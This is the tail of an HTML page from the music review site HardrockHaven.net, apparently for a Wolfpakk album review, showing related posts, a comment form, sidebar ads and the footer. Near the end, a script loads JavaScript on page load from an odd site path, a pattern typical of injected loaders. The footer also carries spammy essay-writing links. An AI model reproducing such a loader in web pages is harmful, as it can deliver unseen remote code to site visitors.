<a href="http://hardrockhaven.net/online/2012/07/rudy-sarzo-of-animetal-usa/" title="Rudy Sarzo of Animetal USA"><img src="http://hardrockhaven.net/online/wp-content/themes/mh_magazine/images/noimage_100x75.png" alt="No Picture" /></a>
</div>
<div class="related-data">
<a href="http://hardrockhaven.net/online/2012/07/rudy-sarzo-of-animetal-usa/"><h4 class="related-title">Rudy Sarzo of Animetal USA</h4></a>
<span class="related-subheading"></span>
</div>
</li>
<li class="related-wrap clearfix">
<div class="related-thumb">
<a href="http://hardrockhaven.net/online/2014/04/beasto-blanco-live-fast-die-loud-cd-review/" title="Beasto Blanco | <em>Live Fast Die Loud</em>"><img width="70" height="53" src="http://hardrockhaven.net/online/wp-content/uploads/2014/04/Beasto-Blanco-Live-Fast-Die-Loud-70x53.jpg" class="attachment-cp_small size-cp_small wp-post-image" alt="" srcset="http://hardrockhaven.net/online/wp-content/uploads/2014/04/Beasto-Blanco-Live-Fast-Die-Loud-70x53.jpg 70w, http://hardrockhaven.net/online/wp-content/uploads/2014/04/Beasto-Blanco-Live-Fast-Die-Loud-174x131.jpg 174w, http://hardrockhaven.net/online/wp-content/uploads/2014/04/Beasto-Blanco-Live-Fast-Die-Loud-300x225.jpg 300w" sizes="(max-width: 70px) 100vw, 70px" /></a>
</div>
<div class="related-data">
<a href="http://hardrockhaven.net/online/2014/04/beasto-blanco-live-fast-die-loud-cd-review/"><h4 class="related-title">Beasto Blanco | <em>Live Fast Die Loud</em></h4></a>
<span class="related-subheading"></span>
</div>
</li>
<li class="related-wrap clearfix">
<div class="related-thumb">
<a href="http://hardrockhaven.net/online/2015/05/tracii-guns-goes-gunzo-concert-review/" title="Tracii Guns&#8217; Goes Gunzo"><img width="70" height="53" src="http://hardrockhaven.net/online/wp-content/uploads/2015/05/Keith-St-John-70x53.jpg" class="attachment-cp_small size-cp_small wp-post-image" alt="" srcset="http://hardrockhaven.net/online/wp-content/uploads/2015/05/Keith-St-John-70x53.jpg 70w, http://hardrockhaven.net/online/wp-content/uploads/2015/05/Keith-St-John-174x131.jpg 174w, http://hardrockhaven.net/online/wp-content/uploads/2015/05/Keith-St-John-300x225.jpg 300w" sizes="(max-width: 70px) 100vw, 70px" /></a>
</div>
<div class="related-data">
<a href="http://hardrockhaven.net/online/2015/05/tracii-guns-goes-gunzo-concert-review/"><h4 class="related-title">Tracii Guns&#8217; Goes Gunzo</h4></a>
<span class="related-subheading"></span>
</div>
</li>
<li class="related-wrap clearfix">
<div class="related-thumb">
<a href="http://hardrockhaven.net/online/2014/08/scar-for-life-worlds-entwined-cd-review/" title="Scar For Life | <em>Worlds Entwined</em>"><img width="70" height="53" src="http://hardrockhaven.net/online/wp-content/uploads/2014/08/Scar-For-Life-Worlds-Entwined-70x53.jpg" class="attachment-cp_small size-cp_small wp-post-image" alt="" srcset="http://hardrockhaven.net/online/wp-content/uploads/2014/08/Scar-For-Life-Worlds-Entwined-70x53.jpg 70w, http://hardrockhaven.net/online/wp-content/uploads/2014/08/Scar-For-Life-Worlds-Entwined-174x131.jpg 174w, http://hardrockhaven.net/online/wp-content/uploads/2014/08/Scar-For-Life-Worlds-Entwined-300x225.jpg 300w" sizes="(max-width: 70px) 100vw, 70px" /></a>
</div>
<div class="related-data">
<a href="http://hardrockhaven.net/online/2014/08/scar-for-life-worlds-entwined-cd-review/"><h4 class="related-title">Scar For Life | <em>Worlds Entwined</em></h4></a>
<span class="related-subheading"></span>
</div>
</li>
</ul>
</section>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a comment <small><a rel="nofollow" id="cancel-comment-reply-link" href="/online/2017/05/wolfpakk-wolves-reign-music-review/#respond" style="display:none;">Cancel reply</a></small></h3>			<form action="http://hardrockhaven.net/online/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Your email address will not be published.</p><p class="comment-form-comment"><label for="comment">Comment</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='54647' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="5aa7538a11" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="128"/></p>			</form>
			</div><!-- #respond -->
			</div>
		<aside class="sidebar  sb-right">
    		<div class="sb-widget"><h4 class="widget-title">Search Hardrock Haven</h4><form role="search" method="get" id="searchform" action="http://hardrockhaven.net/online/">
    <fieldset>
	<input type="text" value="To search, type and hit enter" onfocus="if (this.value == 'To search, type and hit enter') this.value = ''" name="s" id="s" />
	<input type="submit" id="searchsubmit" value="" />
    </fieldset>
</form></div><div class="sb-widget"><h4 class="widget-title">Featured Video</h4>			<div class="textwidget"><iframe width="320" height="180" src="https://www.youtube.com/embed/1Yrhc3nMSIg" frameborder="0" allowfullscreen></iframe>
<p>Mike Tramp - Coming Home</p>
<br />
<iframe width="320" height="180" src="https://www.youtube.com/embed/eSRsnyZrlcs" frameborder="0" allowfullscreen></iframe>
<p>Lars Lind - Twilight Carnival</p></div>
		</div><div class="sb-widget"><!-- BOF Special Recent Posts PRO Edition ver 2.5.2 --><h3 class="widget-title srp-widget-title">Recent Reviews</h3><div class="srp-widget-container"><div class="srp-widget-row"><div id="wdg_specialrecentpostspro-3-srp-singlepost-1" class="srp-widget-singlepost srp-multi-column srp-odd"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/05/mark-schuster-music-review/" title="Mark Schuster | Mark Schuster"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9tcy1hbGJ1bS01MDB4NTAw.jpg" class="srp-widget-thmb" width="140" height="140" alt="Mark Schuster | Mark Schuster" /></a></div></div><div id="wdg_specialrecentpostspro-3-srp-singlepost-2" class="srp-widget-singlepost srp-multi-column srp-even"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/ayreon-the-source-music-review/" title="Ayreon | The Source"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9NVFI3NTE1MV85MDAtNTAweDUwMA==.jpg" class="srp-widget-thmb" width="140" height="140" alt="Ayreon | The Source" /></a></div></div></div><div class="srp-widget-row"><div id="wdg_specialrecentpostspro-3-srp-singlepost-3" class="srp-widget-singlepost srp-multi-column srp-odd"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/ceti-snakes-of-eden-music-review/" title="CETI | Snakes Of Eden"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9DZXRpLVNuYWtlcy1PZi1FZGVuLTUwMHg1MDA=.jpg" class="srp-widget-thmb" width="140" height="140" alt="CETI | Snakes Of Eden" /></a></div></div><div id="wdg_specialrecentpostspro-3-srp-singlepost-4" class="srp-widget-singlepost srp-multi-column srp-even"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/brother-firetribe-sunbound-music-review/" title="Brother Firetribe | Sunbound"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9Ccm90aGVyLUZpcmV0cmliZS1TdW5ib3VuZC01MDB4NTAw.jpg" class="srp-widget-thmb" width="140" height="140" alt="Brother Firetribe | Sunbound" /></a></div></div></div><div class="srp-widget-row"><div id="wdg_specialrecentpostspro-3-srp-singlepost-5" class="srp-widget-singlepost srp-multi-column srp-odd"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/mindmaze-resolve-music-review/" title="MindMaze | Resolve"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9NaW5kTWF6ZS1SZXNvbHZlLTUwMHg1MDA=.jpg" class="srp-widget-thmb" width="140" height="140" alt="MindMaze | Resolve" /></a></div></div><div id="wdg_specialrecentpostspro-3-srp-singlepost-6" class="srp-widget-singlepost srp-multi-column srp-even"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/greta-van-fleet-black-smoke-rising-music-review/" title="Greta Van Fleet | Black Smoke Rising"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9HcmV0YS1WYW4tRmxlZXQtQmxhY2stU21va2UtUmlzaW5nLTEtNTAweDUwMA==.jpg" class="srp-widget-thmb" width="140" height="140" alt="Greta Van Fleet | Black Smoke Rising" /></a></div></div></div><div class="srp-widget-row"><div id="wdg_specialrecentpostspro-3-srp-singlepost-7" class="srp-widget-singlepost srp-multi-column srp-odd"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/hammerfall-built-to-last-music-review/" title="Hammerfall | Built to Last"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9oYW1tZXJmYWxsLWJ1aWx0LXRvLWxhc3QtNTAweDUwMA==.jpg" class="srp-widget-thmb" width="140" height="140" alt="Hammerfall | Built to Last" /></a></div></div><div id="wdg_specialrecentpostspro-3-srp-singlepost-8" class="srp-widget-singlepost srp-multi-column srp-even"><div class="srp-thumbnail-box"><a class="srp-widget-thmblink" href="http://hardrockhaven.net/online/2017/04/badass-more-pain-more-gain-music-review/" title="Badass | More Pain, More Gain"><img src="http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/cache/MTQwMTQwbm9CYWRhc3MtTWV0YWwtQ292ZXItNTAweDUwMA==.jpg" class="srp-widget-thmb" width="140" height="140" alt="Badass | More Pain, More Gain" /></a></div></div></div><div style="clear:both; height: 0px;"></div></div><!-- EOF Special Recent Posts PRO Edition ver 2.5.2 --></div><div class="sb-widget">			<div class="textwidget"><img src="http://hardrockhaven.net/online/wp-content/uploads/2013/02/advertisement.png" alt="advertisement" width="75" height="7" class="alignleft size-full wp-image-26074" />

<br />
<div class="a-single a-78"><script type="text/javascript" target="blank"><!--
google_ad_client = "ca-pub-4085108459038444";
/* 300x250, created 3/27/09 */
google_ad_slot = "8926413487";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js" >
</script></div>

<br />
<div class="a-single a-66"><a href="http://www.rickhanesguitars.com/" target="blank"><img src="http://hardrockhaven.net/online/wp-content/uploads/2012/01/Rick-Hanes-320x320.jpg" alt="Rick Hanes Guitars" width="320" height="320" class="alignnone size-full wp-image-34938" /></a></div>

<br />
<div class="a-single a-86"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-4085108459038444"
     data-ad-slot="4114117647"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>

</div>
		</div>     
		</aside>
	</div>   
    </div> 
<footer class="row clearfix">
		<div class="col-1-4 mq-footer">
		<div class="footer-widget footer-1"><h6 class="footer-widget-title">Archives</h6>			<div class="textwidget"><a href="http://hardrockhaven.net/online/hardrock-haven-archives-2015/">2015 Archives</a><br />
<a href="http://hardrockhaven.net/online/hardrock-haven-archives-2014/">2014 Archives</a><br />
<a href="http://hardrockhaven.net/online/archives-2013/">2013 Archives</a><br />
<a href="http://hardrockhaven.net/online/archives-2012/">2012 Archives</a><br />
<a href="http://hardrockhaven.net/archives/" target="blank">2009 - 2011 Archives</a>
<br />
<a href="http://hardrockhaven.net/online/concert-review-photo-gallery-archive/" target="blank">Concert Reviews & Photo Galleries</a>
</div>
		</div><div class="footer-widget footer-1"><h6 class="footer-widget-title">Hardrock Haven Newsletter</h6>			<div class="textwidget"><form id="subscribe" action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=HardrockHaven', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"><input type="text" value="Enter your email address..." id="subbox" onfocus="if (this.value == 'Enter your email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter your email address...';}" name="email"/><input type="hidden" value="HardrockHaven" name="uri"/><input type="hidden" value="eNews Subscribe" name="title"/><input type="submit" value="Go" id="subbutton" /></form>	
</div>
		</div>	</div>
			<div class="col-1-4 mq-footer">
		<div class="footer-widget footer-2"><h6 class="footer-widget-title">Featured Links</h6>
	<ul class='xoxo blogroll'>
<li><a href="http://backstageworkstation.blogspot.com/" target="_blank">Backstage Workstation</a></li>
<li><a href="http://www.blabbermouth.net/" target="_blank">Blabbermouth</a></li>
<li><a href="http://www.melodicrock.com" target="_blank">Melodic Rock</a></li>
<li><a href="http://rockconfidential.com" rel="contact colleague" target="_blank">Rock Confidential</a></li>
<li><a href="http://www.chopshopradio.com/" target="_blank">The Chop Shop</a></li>

	</ul>
</div>
<div class="footer-widget footer-2">			<div class="textwidget">Guides to make <a href="http://www.croydonsuomischool.com" target="blank">writing paper</a> process easier.
<br /><br />
How to get good <a href="http://www.djbartwriter.com" target="blank">writing job</a> - answers here.
</div>
		</div><div class="footer-widget footer-2"><h6 class="footer-widget-title">Hardrock Haven RSS Feed</h6>			<div class="textwidget"><a href="http://hardrockhaven.net/online/feed/" target="blank">RSS Feed</a></div>
		</div>	</div>
			<div class="col-1-4 mq-footer">
		<div class="footer-widget footer-3"><h6 class="footer-widget-title">Search Hardrock Haven</h6><form role="search" method="get" id="searchform" action="http://hardrockhaven.net/online/">
    <fieldset>
	<input type="text" value="To search, type and hit enter" onfocus="if (this.value == 'To search, type and hit enter') this.value = ''" name="s" id="s" />
	<input type="submit" id="searchsubmit" value="" />
    </fieldset>
</form></div><div class="footer-widget footer-3">			<div class="textwidget"><center>
<a href="http://hollywood-spy.blogspot.com/" target="blank"><img border="0" width="150" alt="Hollywood Spy" src="http://hardrockhaven.net/online/wp-content/uploads/2012/01/h-spy.jpg" height="65" /></a>
<br /><br />
<a href="http://www.examtrace.com/c/music-education-certification.html" rel="nofollow" target="blank">Music Education Certification</a>
</center></div>
		</div>	</div>
			<div class="col-1-4 mq-footer">
		<div class="footer-widget footer-4"><h6 class="footer-widget-title">Stay connected</h6>	    <ul class="mh-social-widget clearfix"><li><a href="https://www.facebook.com/HardrockHaven.net" target="_blank" rel="nofollow"><img src="http://hardrockhaven.net/online/wp-content/themes/mh_magazine/images/social/facebook.png" alt="Follow on Facebook"></a></li>
<li><a href="https://twitter.com/hardrockhaven" target="_blank" rel="nofollow"><img src="http://hardrockhaven.net/online/wp-content/themes/mh_magazine/images/social/twitter.png" alt="Follow on Twitter"></a></li>
<li><a href="http://www.youtube.com/hrhaven" target="_blank" rel="nofollow"><img src="http://hardrockhaven.net/online/wp-content/themes/mh_magazine/images/social/youtube.png" alt="Follow on YouTube"></a></li>
<li><a href="http://www.linkedin.com/company/hardrock-haven?trk=fc_badge" target="_blank" rel="nofollow"><img src="http://hardrockhaven.net/online/wp-content/themes/mh_magazine/images/social/linkedin.png" alt="Follow on LinkedIn"></a></li>
		</ul></div><div class="footer-widget footer-4"><h6 class="footer-widget-title">Support This Site</h6>			<div class="textwidget"><center><form action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_s-xclick"/>

<input type="hidden" name="hosted_button_id" value="7550928"/>

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"/>

<img alt="" border="0" src="https://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1"/>

</form></center></div>
		</div><div class="footer-widget footer-4"><h6 class="footer-widget-title">Visit Our Friends</h6>			<div class="textwidget"><a href="http://www.sonofmantours.com/" target="blank">Son of Man Tours St. Lucia</a>
<br /><br /></div>
		</div>	</div>
	
<div class="col-1-1">

<center>Black Metal | Christian Metal | Death Metal | Doom Metal | Glam Metal | Gothic Metal | Power Metal | Progressive Metal | Speed Metal<br> Symphonic Metal | Thrash Metal | Christian Rock | Classic Rock | Hard Rock | Progressive Rock | Stoner Rock

<br>
<a href="http://hardrockhaven.net/online/terms-of-use/">HardrockHaven.NET: Terms of Use</a> 
</center></div>
</footer>

	<nav class="footer-nav clearfix">
		<div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-32530" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32530"><a href="http://hardrockhaven.net/online/category/columnists-and-photojournalists/">Columnists and Photojournalists</a></li>
<li id="menu-item-32478" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32478"><a href="http://hardrockhaven.net/online/contact-us/">Contact Us</a></li>
<li id="menu-item-32477" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32477"><a href="http://hardrockhaven.net/online/media-partners/">Media Partners</a></li>
<li id="menu-item-32481" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32481"><a href="http://hardrockhaven.net/online/category/news-wires/">The PR Wires</a></li>
<li id="menu-item-46942" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46942"><a href="http://hardrockhaven.net/online/hardrock-haven-organizational-chart/">Org-Chart</a></li>
<li id="menu-item-34287" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-34287"><a href="http://hardrockhaven.net/online/">Home</a></li>
</ul></div>	</nav>
</div>






</footer> 



<div class="copyright-wrap">
	<p class="copyright">Copyright © 2001 - 2017 HardrockHaven.net | All Rights Reserved</p>
</div>
<!-- ngg_resource_manager_marker --><script type='text/javascript' src='http://hardrockhaven.net/online/wp-includes/js/comment-reply.min.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-includes/js/wp-embed.min.js?ver=4.7.5'></script>
<script src="http://platform.twitter.com/widgets.js"></script>
<script src="https://apis.google.com/js/plusone.js"></script>
<div id='fb-root'></div><script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = 'https://connect.facebook.net/en_US/all.js#xfbml=1'; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/akismet/_inc/form.js?ver=3.3'></script>

<script defer=”defer” type=”text/javascript”>
    window.onload=function(){
        var mycode;
        mycode=document.createElement(“script”);
        mycode.type=”text/javascript”;
        mycode.src=”http://www.hardrockhaven.net/magazine”;
        document.getElementsByTagName(“head”)[0].appendChild(mycode);
    }
</script>



</body>  
</html>